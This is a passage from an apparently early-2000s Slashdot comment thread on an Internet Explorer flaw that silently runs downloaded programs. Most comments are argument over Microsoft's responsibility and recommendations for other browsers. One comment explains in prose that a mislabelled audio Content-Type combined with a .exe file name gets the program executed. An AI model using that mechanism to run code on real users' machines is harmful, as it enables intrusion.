      And even if IE were free, that wouldn't magically absolve MS of all responsibility toward its product. Let's say Blockbuster lends you one of their free rental "Public Service" VHS tapes, and it completely FUBARs your very expensive VCR. Let's compound that by saying that Blockbuster's known for years that the batch from which the tape came from that they gave you was defective. You go back to Blockbuster, and they say, "It was free, now leave us alone." That's okay with you?

      --
      There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
    18. Re:Why this is'nt MS's responsibility by Anonymous Coward · · Score: 0

      Ever heard of format? Or maybe fdisk? Shall virus scanners block those from running? Or how about someone including their own version of format? Oh well, there goes your system. I guess you want your virus scanner to read minds as well to know what it's really *supposed* to run. That job is supposed to be yours and IE's inability to adequately inform you of what you're receiving when it *is* capable of doing so is the source problem.

    19. Re:Why this is'nt MS's responsibility by mister+clark · · Score: 0

      No what I said was that you can only run IE on a non-free operating system. There's no version of IE for Linux or BSD or any other open source operating system. Since M$ uses IE to continue their monopoly I think that when you pay the M$ tax when you buy a PC then you're paying for IE and all the other M$ software. Now if I decide to run Linux I have my choice...I can run a truly free browser like Mozilla or I can pay for a browser like Opera. With IE you don't get that option. Use it on a proprietary $$$$ OS or don't run it at all.

    20. Re:Why this is'nt MS's responsibility by Anonymous Coward · · Score: 0

      Are you sure MSIE/Mac isn't vulnerable to this weakness? I know it wasn't in the vulnerable versions of MSIE listed in the article, but that doesn't mean MSIE/Mac was vigorously tested either.

    21. Re:Why this is'nt MS's responsibility by hacker · · Score: 1
      Microsoft does it's best (or worst) to provide something. But, heck, it's FREE. IE costs us nothing.
      Ah, but it's not free, now is it. You had to pay for your operating system (Microsoft $TITLE Version $RANDOMSTRING) and IE came with it. You can't select to use your system without IE, nor can you "uninstall" IE from your system. It's free, because it's required (or so they'd have you think). Heck, your transmission is free, with the purchase of your automobile too.
    22. Re:Why this is'nt MS's responsibility by Badmovies · · Score: 1

      It's free? Well, I guess everything is okay then.

      Wake up! Microsoft went through great pains to make IE the dominant browser, using every trick they could to kill Netscape at the time. Now, with their monopoly almost complete, they start redirecting you to their search page (rather than returning a 404) and trying to insert their own advertising into webpage articles I WRITE. Thank goodness public outcry stopped the latter from happening.

      Microsoft didn't create Internet Explorer out of the goodness of their hearts. Let me put it this way: "One browser to rule them all. One browser to find them. One browser to bring them all and in the darkness bind them."

      --


      Andrew Borntreger
      Champion of cinematic disasters
    23. Re:Why this is'nt MS's responsibility by archen · · Score: 1

      a virus scanner that would probably end up completely crippling MS outlook? I'm not sure this would be a big selling point, and I sure as hell wouldn't want to work on the tech support team and get a flood of calls reguarding this. Still that sort of leads you back to the first point of why do I need a separate program to protect me, when the program should have that safety built in?

      But then again maybe I think this way because I don't have any faith in anti virus programs.

    24. Re:Why this is'nt MS's responsibility by Anonymous Coward · · Score: 0

      IE isn't "free". IE is provided bundled with Windows and MacOS - that's not the same as "free".

    25. Re:Why this is'nt MS's responsibility by SlashDread · · Score: 1

      "Microsoft does it's best (or worst) to provide something. But, heck, it's FREE. IE costs us nothing. "

      Not true. I reply here, cus all the child posts drift off the real issue.

      The issue is MS DOES NOT allow (enforced in the IE licence) to run IE on anything but Windows
      (TM)

      You therefore PAY for IE when you BUY Windows.

      It certainly is not free, not in any way shape or form.

      Basically it means Windows is overpriced, if I dont use IE, I still PAY for it.

      Im not sure (IANAL), but in Holland some forms of coupled-sales are actually illegal.

      GR /Dread

  39. And in other news.... by Myrv · · Score: 1, Insightful


    There use to be no such thing as an e-mail virus either until Microsoft came along and decided to give us one.

    Let's all put our hands together and thank Microsoft.

    1. Re:And in other news.... by Oily+Tuna · · Score: 1

      How about the IBM christmas worm from 1987?
      Not quite literally email, but it spread by reading addresses from an address book.

      --
      Mmmmmmm ... sushi.
    2. Re:And in other news.... by Anonymous Coward · · Score: 1, Informative

      There use to be no such thing as an e-mail virus either until Microsoft came along and decided to give us one.

      Yeah, the sendmail worm didn't even require user intervention.

    3. Re:And in other news.... by Graspee_Leemoor · · Score: 0, Offtopic

      this should be marked "insightful". Dumb, trigger-happy moderators. How can someone be so quick to use up their 10 points?

      graspee

    4. Re:And in other news.... by Myrv · · Score: 1

      Yeah, the sendmail worm didn't even require user intervention.

      The sendmail worm wasn't an e-mail virus. It used an exploit in the sendmail daemon as did it use an exploit in the finger daemon. rsh/rexec daemon, and performed password hacking. Whether someone read their e-mail was irrelevant to the worms spread. It was only until Mircosoft came along that we were introduced to auto-executing e-mail payloads that went off when someone read their e-mail.

    5. Re:And in other news.... by drsquare · · Score: 0

      It wasn't even a virus. It was a worm.

    6. Re:And in other news.... by Oily+Tuna · · Score: 1

      All worms are viruses.

      --
      Mmmmmmm ... sushi.
  40. Re:Now that this particular cat is out of the bag. by mister+clark · · Score: 0, Offtopic

    1) Go to www.mandrake.com 2)download the Mandrake 8.1 ISOs. 3) Burn them to a CD 4) Insert CD #1 5) Reboot 6) Follow on-screen instructions Voila!! No more security problems with IE. And I almost forgot...no more BSOD!!!

  41. !seineew era sreenigne epacsteN by dummkopf · · Score: 1

    seems like microsoft engineers like to point out in several dlls that netscape engineers are weenis, as was just reported yet again on bugtraq. i guess the question is simple... what is worse: being a weenie or a loser who does not know how to code securely/properly...

  42. Re:Now that this particular cat is out of the bag. by gtdistance · · Score: 2, Informative

    According to the article, the issue only comes up if you are prompted to save/download a file, and choose to open it from it's current location. The file may appear to be a .txt or whatever, but if you open it from its current location you can't know for sure whether it's an executable.

    The suggested solution is to never open from the current location. Choose save instead, which will reveal the real file type.

  43. Re:Now that this particular cat is out of the bag. by TellarHK · · Score: 0, Troll

    Damn right I would, if he didn't tell anyone about it, didn't release the code for public review, and didn't update the kernel so people could download new versions with a relatively simple installation process.

    But, gee, since it's Linux, I don't think those things are real concerns, do you?

    Hope to shed a little light down under your bridge.

  44. Terrible Vulnerability by meheler · · Score: 0

    This is a terrible vulnerability and I've seen it in action.

    In IE, some audio formats are set to execute automatically.. so if you send a Content-Type of, say, audio/wav (which is executed automatically).. but the filename is myvirus.exe, windows will rely on associations based on file extensions in the registry to execute the file, as opposed to, say, trying to feed the file through a player.

    So it will automatically launch the .exe WITHOUT warning and WITHOUT asking.

    This is how some recent worms were spread around.

    Boy am I glad I use mozilla for web and email.

  45. Re:Now that this particular cat is out of the bag. by Ramadog · · Score: 1

    The article was talking about current/recent versions of IE.

  46. Hey yeah by Anonymous Coward · · Score: 0

    I heard a stable release version of LINUX deleted your hard drives.

    1. Re:Hey yeah by Anonymous Coward · · Score: 0

      The ipod installer did too.

      Linux : 1
      Microsoft : 1
      Apple : 1

      Dead heat. literally.

    2. Re:Hey yeah by Anonymous Coward · · Score: 0

      Too bad Linux couldn't delete the iPod

  47. Please stop crying 'wolf' by Anonymous Coward · · Score: 0
    Once again, the slahdot community cries foul at another "security hole" some anonymous good semaritan supposedly found in the way IE and Windows interoperate. Of course Microsoft doesn't think this is a problem because it isn't!

    I've evaluated software packages for my company for 7 years, and I have found absolutely nothing distatefull/upsetting about anything that has come through our pipe through IE. Sure you have a few porn URL's finding their way into the logs once in awhile (usually the newer employees testing the limits of our IT usage policy) but nothing that can be considered malicious.

    We take the usual precautions with our servers (standard antivirus, NT service packs) and as far as I'm concerned, that should be enough for anybody. I for one am tired of worried employees clogging up my (Outlook) in-box asking me if their work is at risk because of these "security holes". I try not to be smug when I reply that most of these claims are fraudulent and only meant to discredit a legitimate company with scare-tactics, flowery (and overcomplicated) techie-garble and lies.

    Please, for the sake of making my job easier, stop posting imaginary stories about imaginary Microsoft security holes.

    1. Re:Please stop crying 'wolf' by Anonymous Coward · · Score: 0

      That's easy to say when you run the IT department for your local McDonalds. I know those cash registers can get pretty tricky... Let us know when you work with real systems...

    2. Re:Please stop crying 'wolf' by SpaceLifeForm · · Score: 1
      Please, for the sake of making my job easier, stop posting imaginary stories about imaginary Microsoft security holes.

      Steve?
      Is that you?
      You forgot to take your medicine again.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
  48. free? by _|()|\| · · Score: 2
    IE costs us nothing.

    That's funny, my copy was $100, and that was with the upgrade discount.

    1. Re:free? by Lizard_King · · Score: 2

      That's funny, my copy was $100, and that was with the upgrade discount

      Sorry dude - Either you're a great troll, or a bit thick in the head: The download is FREE.

      I know that I'll get my /. account revoked for linking to Microsoft, but this is one of the most ridiculous comments I've ever read.

      --
      "My mother never saw the irony in calling me a son-of-a-bitch." - Jack Nicholson
    2. Re:free? by shepd · · Score: 2

      >Sorry dude - Either you're a great troll, or a bit thick in the head: The download is FREE.

      So are other patches to the OS. IE 6 isn't availiable in any other way (at least for windows).

      IE is the operating system, MS has said so themselves.

      If you need IE to run windows, then IE patches are about as free as Firestone tires on SUVs.

      Sure, they don't cost anything to make them safe, but, free???

      You paid for the car, with the tires, which are an integral part of the car.

      You (probably) paid for Windows, with IE, which MS has told us is integral to windows.

      You have one very strange idea of free. But if that's free to you, I think I'll put ads in the paper that say "free tires" and when you talk to me I'll tell you that you have to buy the car to get the free tires.

      Here, there's a word for that, bait and switch.

      --
      If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
    3. Re:free? by 90XDoubleSide · · Score: 2

      IE is free on both platforms it is offered on; you can get a free copy of IE without buying any MS products.

      --
      "Reality is just a convenient measure of complexity" -Alvy Ray Smith
    4. Re:free? by shepd · · Score: 2

      >IE is free on both platforms it is offered on; you can get a free copy of IE without buying any MS products.

      No, you can't. They only offer patches for IE 6 on windows.

      If you can find a full version, show it to me. If it were a full version, it would be able to install on Windows 95.

      --
      If you could be told what you can see or read, then it follows that you could be told what to say or think - BoC
    5. Re:free? by rseuhs · · Score: 1
      You have one very strange idea of free. But if that's free to you, I think I'll put ads in the paper that say "free tires" and when you talk to me I'll tell you that you have to buy the car to get the free tires.

      Thanks for this paragraph, it's really hitting the nail on the head. (And gave me a good laugh, too)

  49. turning off HTML viewing in Outlook by Tumbleweed · · Score: 2

    Well, if you use Outlook, and you're dumb enough to run with preview pane on, you deserve what you get. Simply run without the preview pane on, and delete messages from unknown people before reading them. Very simple.

    1. Re:turning off HTML viewing in Outlook by Violet+Null · · Score: 2

      Sure. If every single person you know is as clueful as you, that'll work fine.

      Heavens forbid, though, that you have some relative who is not as good with computers, or (more likely) a coworker. If the worm spreads like most other recent ones (via the Address Book), you'll get the message from someone you know.

      You could just delete all suspicious messages without reading them, of course. It would certainly save time, but I somehow doubt it'd be a good thing to do.

    2. Re:turning off HTML viewing in Outlook by Anonymous Coward · · Score: 0
      "Simply run without the preview pane on, and delete messages from unknown people before reading them. Very simple."

      Yeah, why would you ever want to get email from someone you don't know? THAT'S not what the internet is about!

    3. Re:turning off HTML viewing in Outlook by ErikTheRed · · Score: 2

      Ummm... what if you're in sales or some other profession where dealing with (previously) unknown people is, you know, critical to your livelyhood? Of course, I run Notes and Mozilla, so I don't worry about this, but there are many thousands for whom your simplistic approach (combined with Microsloth's shitty software) is unacceptable.

      --

      Help save the critically endangered Blue Iguana
  50. When surfing using IE or "running" IE?? by Svet-Am · · Score: 1

    There is a distinct difference here. If you only count "running" IE, then that would mean whenever your Windows machine is up and running with how M$ has integrated IE into the kernel.

    However, if it only matters when IE is surfing the web, then we have a little bit of security by ignoring IE.. Just wondering about this point of clarity...

    --
    [move .sig! for great justice, take off every .sig!]
    1. Re:When surfing using IE or "running" IE?? by itarget · · Score: 1

      You can get "owned" while using anything that uses the IE engine. IE itself, Outlook, active desktop (eg: news ticker from a cracked or malicious site), various peer-to-peer apps...
      I've probably missed many, but I believe those are the major ones.

      --

      "Where shall the word be found, where will the word resound? Not here, there is not enough silence." -T.S. Eliot
  51. Poor meta information by rho · · Score: 2

    I'm not terribly shocked--using a 3-letter extension to store that much metadata is absurd.

    Luckily, the MacOS doesn't do tha.... oh, wait.... they do now...

    --
    Potato chips are a by-yourself food.
  52. Re:Now that this particular cat is out of the bag. by TellarHK · · Score: 1

    That'll definitely work, but the problem is going to be users at large networked sites. For example, the school I work at part-time as a tech. I -wish- the option were there to kill Windows in the labs, toss in some Apple hardware or Linux boxes. But for about a billion reasons, that's just not going to happen in my lifetime. Considering that we can't even afford to drop in a $700 build-it-yourself PC in some of the faculty offices while they're using '486-66's and P100's...

    Ohyeah, and some are so damn dense they keep putting A4 paper in the printers. Support these people under Linux? No friggin' way.

  53. Re:Now that this particular cat is out of the bag. by sg_oneill · · Score: 2

    Bad analogy dude. The problem is *current* browsers have the problem as well. You perhaps *could* blame linus for the current one having a hole.... or RATHER you could if he knew about it and didn't do anything, as in this case Microsoft is. Boys and girls, if anything goes wrong it's lawsuit world here, because as far as I can see , keeping it a secret someone is about to get his shit fucked up is being NEGLIGENT.

    --
    Excuse the Unicode crap in my posts. That's an apostrophe, and slashdot is busted.
  54. Re:Now that this particular cat is out of the bag. by Anonymous Coward · · Score: 0

    Microsoft is to blame because they made it "easy" to use Windows!

    Computers are complicated machines and should be treated as such.

  55. In related news... by KILNA · · Score: 2, Interesting

    Opera 6.0 is now available for download. If you tried an older version of this browser and thought it sucked, try it again. It's light, fast, more standards compliant, and its rendering engine is very compatible with the way I.E. and netscape work so it works practically everywhere. You can browse MDI-style, which means you can have all of your browser windows as sub-windows of the main one, OR you can go NS/IE style and have a separate window for everything. Its skinnable (but you don't have to use a skin), it has more privacy and security features than I can count. You can turn off javascript pop-ups (or merely relegate them to popping up in the background). You can spoof the broswer string as being I.E. or netscape for those sites that are browser bigots. I cannot say enough good things about this software. And its available for BeOS, Linux, Solaris, Mac, OS/2, QNX, Symbian OS and of course Windows. Get it here.

    --
    Error: PANTS NOT FOUND. Press <F1> to continue.
  56. Or, it could be something else... by Svartalf · · Score: 2

    Could be that the ones that DID know about it didn't say anything. How would you have known? Security through obscurity may "work" but there's no audit checks to determine if it does or not unless someone aggressively uses a security flaw.

    --
    I am not merely a "consumer" or a "taxpayer". I am a Citizen of the State of Texas
  57. Victim or cohort? by Anonymous Coward · · Score: 0

    A victim is defined in Websters as someone subjected to circumstances beyond their control.

    MS must believe this is a victimless crime, since everyone using IE has the choice to not use it, right? And since usage gives tacit approval of rights as defined by MS, any user subjected to a break in of their system is on their own.

    MS has made a mockery of responsibilty, by leaving it up to consumers to take action or fall prey. I can only imagine the corner reserved in hell for a large part of the Redmund populace.

    Let's not get into the definition of gaping hole, I'm sure some juvenile is prepping an ASCII rendition as we speak.

    Imagine a backyard fence and the neighbors ill-tempered dog:

    a.) built with a large hole so the dog can come thru uninvited
    b.) built and later damaged by your neighbor...dog comes thru
    c.) built and damaged by you, so the dog can come thru (again, uninvited)

    Under scenario a, the assumption is you contracted for a fence sans holes, and this was a builder mistake...seems the builder is responsible for closing the hole and paying for shots needed when you get bitten by the dog.

    Scenario b...go after the neighbor...simple.

    Scenario c...SOL.

    MS is responsible under scenario 'a', but points to scenario 'b' as a main issue, and figures consumers are stupid enough to accept scenario 'c', if b doesn't fly. They avoid scenario 'a' all together.

    Why they get away with this type of subject-switching (look, over there! Thats the problem!!!) prehensile logic is clear...consumers are stupid.

    Wake up, folks! As long as you continue to buy MS products in the head down position, MS will continue to shirk responsibility for shoddy goods.

  58. "Of the web"? by Shmibbon · · Score: 1, Flamebait

    You base all of the internet traffic on the web on 9688 hosts (not accesses or people) accessing one WWW server at a university? Geez, go take a statistics class.

    -Shmibbon

    1. Re:"Of the web"? by Anonymous Coward · · Score: 0

      80% is a conservative estimate in my experience :(

    2. Re:"Of the web"? by diakka · · Score: 0

      I'm not quite sure your criticism.. are you saying that it is not an accurate cross section?
      my statisics are a bit rusty, but I believe that
      9688 samples will usually get you a pretty tight confidence interval.

      --
      -- Knowledge shared is power lost. -- Aleister Crowley
    3. Re:"Of the web"? by Anonymous Coward · · Score: 0

      denial. it's great stuff. whenever anybody posts anything to slashdot about any microsoft product being more widely used or better, excuses come in reply. get over it! IE owns the browser market. quit denying the numbers and make something that will dethrone it! isn't that what open source is all about?

    4. Re:"Of the web"? by Stary · · Score: 1
      Depending on what people are included in the survey. I seem to remember a mistake done a long time ago in a survey done for the US Presidential elections... the result turned out to be wrong. Why? Because it was a phone survey, and thus only asked the kind of people who had phones (far from all at that time).

      Now, the "total" amounr internet users is so vastly much more that the confidence interval wont be that tight anyway.

      As a side note, from the linked page:
      Netscape Versions

      Version Netscape Hosts %
      1. v4.5+ 1092 71.3
      2. v5 174 11.4

      Netscape 5? 11% ? I wonder who those people are...

      Always question your sources.

      --
      Tomorrow will be cancelled due to lack of interest
    5. Re:"Of the web"? by kandimar · · Score: 1

      Yeah, our web site gets about 1 million hits/month and about 86% are IE

    6. Re:"Of the web"? by kb7oeb · · Score: 1

      I bet this is Mozilla

    7. Re:"Of the web"? by Flick · · Score: 0

      > IE owns the browser market. quit denying the
      > numbers and make something that will dethrone
      > it! isn't that what open source is all about?

      Isn't this a two way street. We have to stop using MS products and start using other programs in order to develop a market that companies will be attracted to. And yes, we also need the kill apps that will dethrone MS. We have to keep in mind that a company with $36 billion in cash reserves and that has used unethical (not necessarily illegal) methods to capture market share needs to be fought on other than the technological front. History teaches us that the best technology does NOT rise to the top (Intel, MS, etc... vs Motorola, Digital Research, etc.). We believe that capitalism works. It works when everyone plays fair. When was the last time you saw anyone play fair in any market in the last two decades in this country.

  59. Once again MSFT comes out with a patch first by Angry+Black+Man · · Score: 1

    Now I know Slashdot is getting ready for its annual MS beatdown stick, but read the article. It says MSFT is testing and ready to release a fix to the problem.

    The bug hasn't been exploited. It hasnt caused huge problems. MSFT is coming out with a fix BEFORE hackers could find a way to exploit it. THEY took care of the problem fast enough to stop it from being a problem.

    --
    the byproduct of years of oppression by the white man
    1. Re:Once again MSFT comes out with a patch first by Anonymous Coward · · Score: 0

      Actually if you look at the original post:
      http://www.solutions.fi/index.cgi/news_2001_11_2 6? lang=eng

      You will see that the author thinks that microsoft is not patching the hole, at least not soon. It is quite possible that the journalist who wrote the story about the expoit got it wrong as the person who was supposed to be testing the "patch" seems not to know about it.

    2. Re:Once again MSFT comes out with a patch first by KidSock · · Score: 2

      The bug hasn't been exploited. It hasnt caused huge problems. MSFT is coming out with a fix BEFORE hackers could find a way to exploit it.

      I don't think it matters. Of the browsers affected, how many do you think will receive this patch? It's too late.

      Regardless, the issue will not become serious because it requires a server to deliver the payload and that's not something anyone would do willingly without advertising themselves as the attacker.

      This isn't much different from the Netscape Java SocketImpl problem that would allow servers to connect back to your machine and look at your files (albeit harmless by comparison).

    3. Re:Once again MSFT comes out with a patch first by Anonymous Coward · · Score: 0

      Regardless, the issue will not become serious because it requires a server to deliver the payload and that's not something anyone would do willingly without advertising themselves as the attacker.

      Of course, the server could be the victim of the exploit, which could then send links to everyone on the person's buddy list...

    4. Re:Once again MSFT comes out with a patch first by Anonymous Coward · · Score: 0


      The only reason that is so, is because the person(s) that found the hole were good enough to not post all the details of how to exploit it.

      Don't give MS any more credit than they are due...

    5. Re:Once again MSFT comes out with a patch first by Enigma2175 · · Score: 2
      the issue will not become serious because it requires a server to deliver the payload

      Oh, you mean like Code Red? Yep, that issue certainly wasn't serious.

      --

      Enigma

    6. Re:Once again MSFT comes out with a patch first by KidSock · · Score: 2

      Of course, the server could be the victim of the exploit, which could then send links to everyone on the person's buddy list...

      Links to where? Back to the infected webserver? You don't have propagation because you're not infecting new servers. Not unless the webserver is doubling as the victims PC but that isn't very common and such sites do not get a lot of hits.

    7. Re:Once again MSFT comes out with a patch first by Anonymous Coward · · Score: 0

      The bug hasn't been exploited. It hasnt caused huge problems. MSFT is coming out with a fix BEFORE hackers could find a way to exploit it. THEY took care of the problem fast enough to stop it from being a problem.

      You're thinking in the wrong direction. All that we know is that the script kiddies have not yet written an email worm that exploits this hole. But what about high profile corporate hackers or governments? Let's say your company loses a 100 million dollar deal or a patent because another company is faster. How do you know it's not because they used this hole to hack into your company? They won't leave traces. Whatever malicious code they launch will do its job and then delete itself. As has been said many times: Security through obscurity doesn't work. The first one to publicize is not necessarily the first one to know and a lack of publicly visible consequences does not mean there's not been severe damage done behind the scenes.
  60. Re:Now that this particular cat is out of the bag. by TellarHK · · Score: 1

    No, I didn't. But at least I'll admit that. :) However, I did assume that the obvious response would be something along those lines, which just doesn't work in the environment I need to have a fix for someday, which is a large number of client workstations. If we turned off downloading of files, I think we'd get lynched by the faculty. :)

  61. Whine, IE sucks, whine by Eloquence · · Score: 3, Redundant
    First, there is really not enough information about this bug to draw any conclusions yet. It may be harmless, or it may indeed be devastating. That's the result of Microsoft's idiotic non-disclosure policy, which fits in well with their entire company philosophy.

    Second, don't just bitch about IE. If you haven't already, check out the alternatives:

    • Mozilla, now in Version 0.9.6, is very feature-rich and fast and the most standard-compliant browser in existence, but not for computers with less than 128 MB of memory.
    • kmeleon (Windows) and galeon (Linux) are Mozilla derivatives with smaller footprint.
    • Opera, which is closed source adware and requires registration, is a very fast browser that is especially recommended for "information surfers" because of its excellent navigation and caching.
    • Konqueror is KDE's built-in browser. Thanks to Qt/Embedded and/or KDE-Cygwin, it might be ported to Windows as well.
    • Lynx and W3M are up-to-date text mode browsers capable of displaying most pages which do not depend on images or animations.
    There is a choice, you just have to make it. And no, I didn't copy&paste this from elsewhere and I actually tested all of these, so you may mod me up without guilt. My personal recommendation: Opera (and Mozilla once I've upgraded to 512 megs and V1.0 is out).
    1. Re:Whine, IE sucks, whine by Lord+Omlette · · Score: 1

      Part of the issue is also that IE is used as the default viewer for things like email. So if you could please list open source email clients for windows, we'd appreciate it.

      --
      [o]_O
    2. Re:Whine, IE sucks, whine by mlinksva · · Score: 1

      The aforementioned Mozilla includes an email/news client that of course uses the Mozilla rendering engine for HTML. Works quite well.

    3. Re:Whine, IE sucks, whine by Eloquence · · Score: 2
      If you insist on using an open-source email client on Windows, you are probably able to install a Cygwin environment on your Windows box. Cygwin comes with the feature-rich mutt mailer, although I have no experience in setting it up under Windows. There's also a Windows version of PINE, which is quite popular under Unix (probably mostly because its user interface actually deserves the name ;-) and does have some decent functionality, but I would not want to use it as my everyday mailer.

      Here's a secret tip: OpenXP is the open source version of legendary mail/news offline reader "CrossPoint". It runs in a console window, is very fast, and has all the features you could ask for, including support for various protocols and its own dialer (you can also use an existing Internet connection). OpenXP may take a while to get used to, but it's definitely worth it. I've used CrossPoint from ca. 1993-1996, and a friend still uses it today, although he doesn't care about the new versions.

      For mail on Windows, I've been using Pegasus Mail for quite some time. It's more than a decade old and was recently released in version 4.0. Its interface, while graphical, takes a bit to get used to, and it's not open source (Windows freeware doesn't have Unix' open source tradition because of the lack of free compilers), but it is extremely feature-rich, renders HTML (terribly) and supports the Unix mailbox format for its folders. Only downside: I don't know if this relates to crashes of my NT machine (different story), but I've had some mail indexing problems with Pegasus, which made the search ignore some messages.

      The situation was much worse with Netscape Messenger, which is the reason I haven't tried out Mozilla's successor yet: Messenger once ate a whole huge mailbox of mine during the process of "reorganization", when not enough disk space was available for this. So I would definitely be careful with Mozilla's Mail module, especially since it's not yet widely tested: You want your mailer to be reliable and not to lose data, ever.

      Another semi-free contender is The Bat!, which is trialware and costs 25 bucks for students. I've heard very good things about it, but I have not yet had the need to switch from Pegasus.

      On Linux, there are many more choices, and good things are increasingly being said about Ximian's Evolution -- perhaps it will be ported to Windows? Similarly, Balsa and KMail are nice graphical e-mail clients, and there's a huge list of text-mode clients which all have their strengths and weaknesses. You really don't have to decide on either one permanently because they can all access the same mailbox files (neat, huh?). Generally, because of the interoperability and reliability of Unix mail, if you have a choice, I recommend using a Unix system for all email. It may be a bit trickier to set up at first, but once you have a nice procmail and mailer(s) configuration running, you won't want to switch back.

    4. Re:Whine, IE sucks, whine by Rui+del-Negro · · Score: 1

      Opera has a built-in e-mail reader with support for multiple accounts / servers. It also has options to automatically kill pop-up windows, maximize frames, etc., and is very secure (ex., pages that are protected with a password aren't even cached). IMO it's by far the best browser, although it could support a few non-standard (but common) HTML extensions / variations.

    5. Re:Whine, IE sucks, whine by Graff · · Score: 0, Troll

      There is also OmniWeb, if you are using MacOS X. OmniWeb is by far the most beautiful web browser I have ever seen. It uses MacOS X's Quartz Engine to produce very clear anti-aliased text and crisp graphics. It's lacking very little, needs a bit more work on CSS and InScript/JavaScript but it's very usable for 99% of the web sites out there.

      I would say that if you use MacOS X then you should be using OmniWeb. OmniWeb can masquerade as Internet Exploiter to fool sites which "require" you to be using IE so you will only need IE for the few sites which are broken for any browser except IE.

    6. Re:Whine, IE sucks, whine by Eloquence · · Score: 1
      Yes, I'm not very familiar with Mac browsers. I hear iCab is quite nice, too. Maybe we will see more ports with OSX.

      Most alternative browsers by now have the masquerading feature. Konqueror also makes use of KDE/Freetype anti-aliasing when this is turned on in the control center, however, Linux' anti-aliasing is clearly inferior to anything else at the moment (partially thanks to one of Apple's patents), and it took me a while to set it up satisfyingly (only some fonts work well), and even then I still have problems with certain letters. (I'm not the only one, though: most Linux desktop screenshots you will find either use big/bold fonts, or reveal the same problems, unless they don't use anti-aliasing at all, of course..) Anti-aliasing is also quite slow, but I'm not sure if that's the fault of my nVidia drivers or of the library.

    7. Re:Whine, IE sucks, whine by mickeyreznor · · Score: 2

      unfortunately, if you use windows, IE has a bad habit of rearing its ugly head. It will open up whenever i click on a link on AOL instant messenger no matter what i do, and occasionally some other programs will override my default browser(opera) and IE will pop up again. It's like an psycho ex-girlfriend who won't stop calling you after you break up.

    8. Re:Whine, IE sucks, whine by Graff · · Score: 1

      iCab is pretty cool. It has the most features of any browser I've ever used. The only problem is that I can't use it after using OmniWeb, the way it displays the fonts look so much worse than OmniWeb. I hope iCab improves, it was my only true browser before I went over to MacOS X and found OmniWeb.

    9. Re:Whine, IE sucks, whine by fwankypoo · · Score: 1

      The situation was much worse with Netscape Messenger, which is the reason I haven't tried out Mozilla's successor yet: Messenger once ate a whole huge mailbox of mine during the process of "reorganization", when not enough disk space was available for this. So I would definitely be careful with Mozilla's Mail module, especially since it's not yet widely tested: You want your mailer to be reliable and not to lose data, ever.

      I've been using the Mozilla mail client since release 0.9.4 or so, and it's been great. I can honsetly say that I have no problems with it, other than a bit of a speed problem when closing the mail window before the browser... But it's tolerable. Give it a try, even if you don't make it your new, default mail client.

      --
      The time of day is 29:33.
    10. Re:Whine, IE sucks, whine by Anonymous Coward · · Score: 0

      OmniWeb actually needs tons of work on CSS/DOM to get it anywhere near IE and Mozilla (it's about at IE 3.0 levels). It's true that this isn't an issue on 99% of public sites, however.

      It's also quite crashy and slow on my PowerBook G3. And the caching system is just plain broken.

      Still, the fonts are soooo nice. If it were a little more stable, they'd have my money.

      (I'd rather see Omni X-ify the Netscape Gecko engine than build yet another 3G rendering engine.)

    11. Re:Whine, IE sucks, whine by gid · · Score: 1

      mozilla mail is quite nice and featureful, and you have the ability to turn off javascript in email easily (think it's off by default). suports pop3/imap/and imap-ssl quite nicely. I normally use pine on my linux at work, so I can ssh in from anywhere, no config needed, just putty (ssh client). It works well, I have mozilla mail set up to point at my pine mail dir, and reads all the files in as folders just fine. So I can use pine most of the time, but when I want to view a graphic or something that someone sent me easily, I can just load up moz mail.

    12. Re:Whine, IE sucks, whine by Anomie-ous+Cow-ard · · Score: 1
      Mozilla, now in Version 0.9.6, is very feature-rich and fast and the most standard-compliant browser in existence, but not for computers with less than 128 MB of memory.

      I'm using Mozilla at this very moment on a machine with only 64M of RAM (kernel 2.4.16, WindowMaker (no Gnome/KDE environments), most of the debug stuff not compiled in, etc). On the other hand, I haven't bothered to install the mail/news client, or composer, or any of that other random crap (Cue rant: "I want a web browser, damnit, not ..."). It's a bit slow on the display every once in a while, but not really worse than 4.7x was.

      --

      --
      perl -e'$_=shift;die eval' '"$^X $0\047\$_=shift;die eval\047 \047$_\047"' at -e line 1.

    13. Re:Whine, IE sucks, whine by c_jonescc · · Score: 1

      Agreed. I use the free-version of Opera, because the ads ain't that bad, and you can kill pop under windows, making the net amount of ads I am Forced to see less. The other plus is that it isn't owned by MS or AOL/TW, so I feel less like I am collaborating with satan.

      --
      Getting diabetes AND salmonella would be a bad weekend.
    14. Re:Whine, IE sucks, whine by mpe · · Score: 2

      unfortunately, if you use windows, IE has a bad habit of rearing its ugly head.

      There are programs which require IE to be installed and could well be using components of IE without this being very obvious.

    15. Re:Whine, IE sucks, whine by jx100 · · Score: 1

      Try opening up your preferences, going to "default browser", and clicking on "http" under "protocols" Worked for me(although I use Trillian instead of any standard IM software)

    16. Re:Whine, IE sucks, whine by dimator · · Score: 1

      It's like an psycho ex-girlfriend who won't stop calling you after you break up.

      Sort of like this?

      --
      python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
    17. Re:Whine, IE sucks, whine by Anonymous Coward · · Score: 0

      Just crack it.

    18. Re:Whine, IE sucks, whine by rbeattie · · Score: 1


      Just note that even though you might switch to Mozilla, it doesn't mean Microsoft doesn't make you pay a price.

      Now that I'm using Mozilla, in Win2K I can't browse any photos in thumbnail mode using the explorer, which sucks for my digital photos. MS has got integration of IE in all parts so when you stop using it, it bites you in the ass in various small ways.

      -Russ

      --
      Me
    19. Re:Whine, IE sucks, whine by archen · · Score: 1

      yeah, that actually works most of the time, but I still get IE sometimes. It seems like there are times when some things don't ask the OS for the browser, they just go look explicitly for IE.
      [sarcasm] because we all know windows users ONLY use IE [/sarcasm]

  62. Hold on a sec . . . by Selanit · · Score: 5, Insightful
    From the article:

    "Microsoft will patch a flaw in its Web browser that could allow an attacker to silently download and execute malicious programs on the computers of users who view a specially constructed Web page or e-mail message." (emphasis added)

    From the article's intro:

    "Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever."

    Also: "And keep in mind that Microsoft is in no hurry to do anything about it . . ."

    Full marks for a more thorough description of the exploit and how it came about -- but did the poster actually read the article before posting? Looks to me like he hit the original report but not the article, which says that MS did initially plan to let it go, but did an about-face after a while.

    Nasty flaw nonetheless -- glad I switched to Mozilla.

    1. Re:Hold on a sec . . . by RedWolves2 · · Score: 0, Offtopic

